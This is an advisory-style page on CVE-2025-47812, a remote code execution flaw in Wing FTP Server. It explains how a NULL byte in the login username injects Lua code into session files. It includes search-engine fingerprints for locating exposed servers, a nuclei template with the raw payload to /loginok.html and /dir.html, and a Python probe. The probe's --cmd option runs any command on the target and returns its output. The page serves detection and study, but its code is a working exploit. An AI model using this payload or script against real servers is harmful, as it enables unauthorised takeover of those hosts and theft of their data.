Wing FTP Server Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: Wing FTP Server Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-47812

Vulnerability type: command execution

Severity: critical

Description: Wing FTP Server is a widely used FTP server that supports several file-transfer protocols (FTP, HTTP, FTPS, HTTPS and SFTP) and is commonly deployed for enterprise file sharing and data transfer; its ease of use and feature set have given it a footprint across many industries. CVE-2025-47812 affects Wing FTP Server 7.4.3 and earlier. The root cause is improper handling of the 'username' parameter during login, specifically of NULL bytes: the login check treats the NULL byte as the end of the string and therefore sees only the part before it (e.g. "anonymous"), while the complete value is written into the Lua session file, so everything after the NULL byte becomes injected Lua code. When an authenticated endpoint such as /dir.html is then requested, the session file is executed and the attacker's commands run on the server with elevated privileges. Note that the flaw is exploitable only when anonymous login is enabled. Because it yields unauthenticated remote code execution with low attack complexity, the potential impact is severe: full server compromise, disclosure of sensitive data, and use of the host as a pivot for further attacks.

Vendor: wing_ftp_server

Product: Wing FTP Server

Affected versions: <= 7.4.3

Search queries: http.html_hash:2121146066, http.favicon.hash:963565804, title:"Wing FTP Server", "Server: Wing FTP Server", icon_hash="963565804", title="Wing FTP Server", "Server: Wing FTP Server", app="Wing FTP Server"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-47812.yaml

Type: projectdiscovery/nuclei-templates: github issues

PoC details


id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.97
    epss-percentile: 0.99
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth,kev

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and
# digest: 4b0a0048304602210086e6de6403641ae1d7c2b4e2fda239c45edeee6f6fb067f2fbdda234b67e79e502210090ee323cfc7e014e8ee545f64d15c176aa1d1f02c7a07dc3450b10df42f2dd17:922c64590222798bb761d5b6d8e72950
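The two-request exchange from the template above, and the NULL-byte mechanism described in the vulnerability description, as an added example in Python (this is not the template authors' PoC and not Wing FTP's own code). It builds the same 'username' value the template sends (the "]]" closes the Lua long-bracket string the username is embedded in, the "--" comments out whatever follows), percent-encodes it byte by byte, POSTs it to /loginok.html and then fetches /dir.html through a cookie jar. Assumptions not stated on the page: the server identifies the session by a cookie set on /loginok.html, which is why a shared cookie jar is used instead of a named cookie; and model_session_fragment() is a simplified model of the bug for illustration, not the server's real session-file format. The default command is the same harmless marker the template uses, so a hit means only that the marker was echoed back.

```python
"""
Probe for CVE-2025-47812 re-implemented from the nuclei template on this page.
Added example; not the template authors' PoC and not Wing FTP Server code.
Assumptions: the session is tied to a cookie set by /loginok.html (hence the
cookie jar), and model_session_fragment() is a simplified model of the bug.
"""
import argparse
import http.cookiejar
import urllib.error
import urllib.parse
import urllib.request

MARKER_CMD = "echo CVE-2025-47812"   # same harmless marker the template uses

# Lua appended after the NUL byte. "]]" closes the long-bracket string the
# server wraps the username in; "--" comments out whatever the server appends.
# "\r" is the line separator the template uses (%0d).
LUA_TEMPLATE = (
    ']]\r'
    'local h = io.popen("{cmd}")\r'
    'local r = h:read("*a")\r'
    'h:close()\r'
    'print(r)\r'
    '--'
)


def build_username(cmd: str) -> bytes:
    """Raw (un-encoded) username bytes: 'anonymous', a NUL byte, then the Lua."""
    if any(c in cmd for c in '"\r\n'):
        raise ValueError("command must not contain double quotes or line breaks")
    return b"anonymous\x00" + LUA_TEMPLATE.format(cmd=cmd).encode("utf-8")


def build_login_body(cmd: str = MARKER_CMD) -> str:
    """Form body for POST /loginok.html; every byte outside [A-Za-z0-9_.-~] is %XX-encoded."""
    encoded = urllib.parse.quote_from_bytes(build_username(cmd), safe="")
    return "username=" + encoded + "&password="


def model_session_fragment(username: bytes):
    """Simplified model of the root cause (an assumption, not Wing FTP's actual code):
    the login check reads the username as a C string and stops at the NUL, so it
    sees only 'anonymous'; the session writer embeds the full byte string inside a
    Lua long-bracket string, where the injected ']]' ends the literal and the rest
    is parsed as code when the session file is loaded."""
    seen_by_login_check = username.split(b"\x00", 1)[0]
    written_to_session_file = b"username = [[" + username + b"]]"
    return seen_by_login_check, written_to_session_file


def is_vulnerable(body: str, marker: str = "CVE-2025-47812") -> bool:
    """Same check as the template's matcher: the marker is echoed back in /dir.html."""
    return marker.lower() in body.lower()


def probe(base_url: str, cmd: str = MARKER_CMD, timeout: float = 10.0) -> str:
    """POST the crafted login, then GET /dir.html with whatever cookies came back."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    base = base_url.rstrip("/")

    login = urllib.request.Request(
        base + "/loginok.html",
        data=build_login_body(cmd).encode("ascii"),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with opener.open(login, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        err.read()  # a non-2xx here does not by itself prove the session file was not written

    try:
        with opener.open(base + "/dir.html", timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="CVE-2025-47812 probe (authorized testing only)")
    ap.add_argument("base_url", help="e.g. http://host:port of the Wing FTP web interface")
    ap.add_argument("--cmd", default=MARKER_CMD, help="command to run; default is the echo marker")
    args = ap.parse_args()
    body = probe(args.base_url, args.cmd)
    if args.cmd == MARKER_CMD:
        print("vulnerable" if is_vulnerable(body) else "marker not found")
    else:
        print(body)
```

The encoder deliberately percent-encodes every non-alphanumeric byte, so the body differs cosmetically from the template's (which leaves "]]", quotes and parentheses bare), but decodes to the same bytes; the important parts are the %00 and the %0D separators. If the probe returns "marker not found" on a host that fingerprints as Wing FTP, check first whether anonymous login is enabled, since the page notes the flaw is only reachable in that configuration.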


http://example.com/2025/07/28/github_996791619/
Author: lianccc
Published: July 28, 2025
License: